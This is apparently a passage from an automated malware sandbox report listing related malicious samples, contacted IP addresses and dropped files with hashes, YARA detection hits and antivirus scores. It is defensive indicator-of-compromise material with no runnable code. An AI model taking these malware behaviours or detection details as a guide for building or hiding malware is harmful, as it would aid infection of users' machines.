                                                                                  Invoice- 876543456 Oil_Field_Swift_remmitance.docGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  e4eukUb6d1.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  KZrl2MY8C5.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  RFQ 6674234ACX.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  LuminarAISetup (6).exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  702d02cc220387cd8f2029520cde97bd3879a1e151b19.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233
                                                                                  u5wvRSIA2Z.exeGet hashmaliciousBrowse
                                                                                  • 162.159.129.233
                                                                                  • 162.159.134.233

                                                                                  Dropped Files

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  C:\Users\user\AppData\LocalLow\sqlite3.dllZ6hcy6XH34.exeGet hashmaliciousBrowse
                                                                                    AutoInstallYouTube.exeGet hashmaliciousBrowse
                                                                                      Mu9ZCqJHeC.exeGet hashmaliciousBrowse
                                                                                        gvMIh3X76V.exeGet hashmaliciousBrowse
                                                                                          SkB6zJ6H3N.exeGet hashmaliciousBrowse
                                                                                            TJL22phPvo.exeGet hashmaliciousBrowse
                                                                                              Sa3qSXcAEN.exeGet hashmaliciousBrowse
                                                                                                Md0q201V1D.exeGet hashmaliciousBrowse
                                                                                                  r6mYDTO464.exeGet hashmaliciousBrowse
                                                                                                    yj2Lz2zdxp.exeGet hashmaliciousBrowse
                                                                                                      y1JBw0eea5.exeGet hashmaliciousBrowse
                                                                                                        3ZyUSJ3Dmh.exeGet hashmaliciousBrowse
                                                                                                          21sSRmeUyz.exeGet hashmaliciousBrowse
                                                                                                            T3b3T3kPh9.exeGet hashmaliciousBrowse
                                                                                                              1T3xPkcnQz.exeGet hashmaliciousBrowse
                                                                                                                LGYVhwojpi.exeGet hashmaliciousBrowse
                                                                                                                  Bi6Q4LEA04.exeGet hashmaliciousBrowse
                                                                                                                    1wA4XkP6iw.exeGet hashmaliciousBrowse
                                                                                                                      JN5tFI4L70.exeGet hashmaliciousBrowse
                                                                                                                        oTC2ep3VQP.exeGet hashmaliciousBrowse

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):73728
                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                          Malicious:false
                                                                                                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):73728
                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                          Malicious:false
                                                                                                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                          Malicious:false
                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.6969296358976265
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBo2+tYeF+X:T5LLOpEO5J/Kn7U1uBo2UYeQ
                                                                                                                          MD5:A9DBC7B8E523ABE3B02D77DBF2FCD645
                                                                                                                          SHA1:DF5EE16ECF4B3B02E312F935AE81D4C5D2E91CA8
                                                                                                                          SHA-256:39B4E45A062DEA6F541C18FA1A15C5C0DB43A59673A26E2EB5B8A4345EE767AE
                                                                                                                          SHA-512:3CF87455263E395313E779D4F440D8405D86244E04B5F577BB9FA2F4A2069DE019D340F6B2F6EF420DEE3D3DEEFD4B58DA3FCA3BB802DE348E1A810D6379CC3B
                                                                                                                          Malicious:false
                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\LocalLow\riWMtPheV8
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):118784
                                                                                                                          Entropy (8bit):0.4588965670203364
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:T1YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:OWU+bDoYysX0uhnydVjN9DLjGQLBE3u
                                                                                                                          MD5:16C3DE08951964D7D40D5205692A3D82
                                                                                                                          SHA1:EA06159A8A50E853806DD09F830B0C39E3374E75
                                                                                                                          SHA-256:2DB39320E9691AC1690723A33BC7AA2330B1B63621B3AFAEDBEB0E10463192F5
                                                                                                                          SHA-512:E0B54313A7A6188DC711CCDC7854CEF3456D79BA1E29AF7BD7310733B03167434D063C3D51DBB63D426919088104D46CA42815DEF9337B4C604F1DD0150CCE5A
                                                                                                                          Malicious:false
                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):916735
                                                                                                                          Entropy (8bit):6.514932604208782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                                                          MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                                                          SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                                                          SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                                                          SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: Z6hcy6XH34.exe, Detection: malicious, Browse
                                                                                                                          • Filename: AutoInstallYouTube.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Mu9ZCqJHeC.exe, Detection: malicious, Browse
                                                                                                                          • Filename: gvMIh3X76V.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SkB6zJ6H3N.exe, Detection: malicious, Browse
                                                                                                                          • Filename: TJL22phPvo.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Sa3qSXcAEN.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Md0q201V1D.exe, Detection: malicious, Browse
                                                                                                                          • Filename: r6mYDTO464.exe, Detection: malicious, Browse
                                                                                                                          • Filename: yj2Lz2zdxp.exe, Detection: malicious, Browse
                                                                                                                          • Filename: y1JBw0eea5.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 3ZyUSJ3Dmh.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 21sSRmeUyz.exe, Detection: malicious, Browse
                                                                                                                          • Filename: T3b3T3kPh9.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 1T3xPkcnQz.exe, Detection: malicious, Browse
                                                                                                                          • Filename: LGYVhwojpi.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Bi6Q4LEA04.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 1wA4XkP6iw.exe, Detection: malicious, Browse
                                                                                                                          • Filename: JN5tFI4L70.exe, Detection: malicious, Browse
                                                                                                                          • Filename: oTC2ep3VQP.exe, Detection: malicious, Browse
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2049.exe.log
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1039
                                                                                                                          Entropy (8bit):5.365622957937216
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                                                                                                                          MD5:AE8CFF33270358D6EC23793128B3EF2F
                                                                                                                          SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                                                                                                                          SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                                                                                                                          SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                                                                                                                          Malicious:false
                                                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3113.exe.log
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2388
                                                                                                                          Entropy (8bit):5.316698480382997
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MxHKXwYHKhQnoPtHoxHhAHKzvKvDfHK7HKhBHKdHKBSTHvmHKoLHG1qHjHKdHAHJ:iqXwYqhQnoPtIxHeqzyLq7qLqdqsOqop
                                                                                                                          MD5:8D07DA6ADF26171FB8B75E325982B197
                                                                                                                          SHA1:5A79618D65D425CED078CE27610660D756D4DD1F
                                                                                                                          SHA-256:0405F22E0D1FC9204A4F7E8E4773F06E5BFDCAD5D8728EF7F27DFDA99934D8CA
                                                                                                                          SHA-512:FE71424006CFB058207842B4E6EB55DA4D9F77AF5EA7566493D66E9215488F8A2BD083E5BA46C1B9BC797345B3D4B1763E02F874C0024675BC445EBC0444C383
                                                                                                                          Malicious:false
                                                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral
                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):22192
                                                                                                                          Entropy (8bit):5.605134357688207
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:1ntCDeq0+ZV/Sj5z+y4KnEjultIu77Y9gBSJ3x6T1MavZlgRV7O3DmZBDI+iaq:df4KEClthfBcACufYHVa
                                                                                                                          MD5:D888802821CD235B4994C3935E449084
                                                                                                                          SHA1:E775B753D0F02736DA10F7F0B880EF1C8E0C2F67
                                                                                                                          SHA-256:CA91B91D6355636250D30241873B19E79868534426B524B7FD5524502D1E0FBC
                                                                                                                          SHA-512:9CA55F1B2060E5BB8747269028C7BE25C2C0CCA881F2EA785F7E1286389CAA7563AFC9DC88953E3B0F049611B31528BB05B2546C2C59E72CF7B9496F098DE399
                                                                                                                          Malicious:false
                                                                                                                          Preview: @...e...........d.......h.......~.....<.4.I..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                          C:\Users\user\AppData\Local\Temp\1105.tmp
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\3C9D.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):1622408
                                                                                                                          Entropy (8bit):6.298350783524153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:hNZ04UyDzGrVh8xsPCw3/dzcldJndozS35IW1q/kNVSYVEs4j13HLHGJImdV4q:dGrVr3hclvnqzS35IWk/LvRHb0
                                                                                                                          MD5:BFA689ECA05147AFD466359DD4A144A3
                                                                                                                          SHA1:B3474BE2B836567420F8DC96512AA303F31C8AFC
                                                                                                                          SHA-256:B78463B94388FDDB34C03F5DDDD5D542E05CDED6D4E38C6A3588EC2C90F0070B
                                                                                                                          SHA-512:8F09781FD585A6DFB8BBC34B9F153B414478B44B28D80A8B0BDC3BED687F3ADAB9E60F08CCEC5D5A3FD916E3091C845F9D96603749490B1F7001430408F711D4
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!y>.@.m.@.m.@.m...l.@.mg$.l.@.mg$.lN@.mg$.l.A.mg$.l.@.mg$.l.@.mg$.m.@.mg$.l.@.mRich.@.m........................PE..L...s<s............!.....,...................P....(K......................................@A.............................&..............8............h...Y.......N..`l..T............................................................................text....).......*.................. ..`RT...........@...................... ..`.data...dW...P.......0..............@....mrdata.h#.......$...>..............@....00cfg...............b..............@..@.rsrc...8............d..............@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512512
                                                                                                                          Entropy (8bit):7.846723941917503
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:Tw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+LF:TVhdLVg2Zep7njXzPDxC+J
                                                                                                                          MD5:F57B28AEC65D4691202B9524F84CC54A
                                                                                                                          SHA1:F546B20EB40E3BC2B6929BA0F574E32422CED30C
                                                                                                                          SHA-256:87D86132095541ED3B5FE05EB06692E1712287B6FFD9832A28EB85F52B55F0A5
                                                                                                                          SHA-512:1A773186B0A15F743F8D9681036A9ECA45E2DD5F7944725498E929C5438ACFFCD753061EB475383E5759FC41A8ADE4EB717F3D3529313C3C0D48C659B5E36F09
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\2049.exe, Author: Florian Roth
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. .......................@............`.....................................S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........u...p..........HZ..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                          C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):22528
                                                                                                                          Entropy (8bit):5.395556088889033
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ezekc2D26R7pXha5eglsu2tiP39n+NDr7vGuywqFGc1QzOQslg:qJcMnacgl6Q10rSuywCZ1QO
                                                                                                                          MD5:787AF677D0C317E8062B9705CB64F951
                                                                                                                          SHA1:41BF391CE44004A22BA7F18E5FDCDCFCEA73E38F
                                                                                                                          SHA-256:7CFA3F3EBB7DCE336E24DF02D5BA0FDBC081927892D597986113FB11EDF1702E
                                                                                                                          SHA-512:8A9BF2D0DF12926F3253DCF5F2B5186928107C36189F404C50C69B67BC09DDA267FACD53E3259ABF3934DE6682BC3B0E49D1D5ACCFA5D4A5B702F4F9EF8D8B45
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\3113.exe, Author: Florian Roth
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 22%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..N..........nl... ........@.. ..............................P.....`..................................l..S....................Z............................................................... ............... ..H............text...tL... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................Pl......H.......PK... ..........................................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                          C:\Users\user\AppData\Local\Temp\3C9D.exe
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):212992
                                                                                                                          Entropy (8bit):6.734269361613487
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                                                                                          MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                          SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                                                                                          SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                                                                                          SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\5508.exe
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):161280
                                                                                                                          Entropy (8bit):5.163359140538006
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:hj1+ax5s9jVultxyIAMzTjSMzTjoIe1UhCp:hJqjVoeN
                                                                                                                          MD5:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                                                                                          SHA1:6E1ACD6CB17AB64AC6DBF0F4400C649371B0E3BD
                                                                                                                          SHA-256:08D67F957EC38E92301EEAAAF2759EF2A070376239EAD25864C88F3DD31EAB8C
                                                                                                                          SHA-512:14A1CD1090A2ECCEA3B654EEE2B7D4DE390219F8C3C200D97D2AB431311BDF24B1B40F2F38E78804AD286654CD33DFB515704C9B863DAF0786A0D633F05C9BF2
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\5508.exe, Author: Florian Roth
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 43%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P..l.............. ........@.. ...................................@.....................................O....................x............................................................... ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B.......................H.......(u..t.......A...HL...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                                                                                                                          C:\Users\user\AppData\Local\Temp\6630.exe
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):348672
                                                                                                                          Entropy (8bit):5.997778327285649
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:0BbSn3n6QHUKl3hINRqdhUm6b8mCcNebxCg1:Eu3n6UUKlxS2Um6b8mCcNej
                                                                                                                          MD5:539C39A9565CD4B120E5EB121E45C3C2
                                                                                                                          SHA1:5E1975A1C8F9B8416D9F5F785882DFB0CC9161DC
                                                                                                                          SHA-256:C673B8408DB0EB515651E6A6F3361C713903001011C6E13A1825C0376A83D1DD
                                                                                                                          SHA-512:3CC343A53051BE34B4CAD9AA9A9AE68D6B5A978B2ECD10516E4934452D29A9455A6CEB5EB7C7B691B2D08F1781BFB7B1E3627CB2823DD4F60860861F2202BA8F
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.>.T.m.T.m.T.m."2m.T.m.".m.T.m."3mqT.m.,.m.T.m.T.m.T.m."6m.T.m.".m.T.m.".m.T.mRich.T.m........PE..L....8?`......................v.....`.............@...........................z......f......................................$...d....py..I....................y..... ..................................@............................................text............................... ..`.data...H.u.........................@....rsrc....I...py..J..................@..@.reloc...#....y..$..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
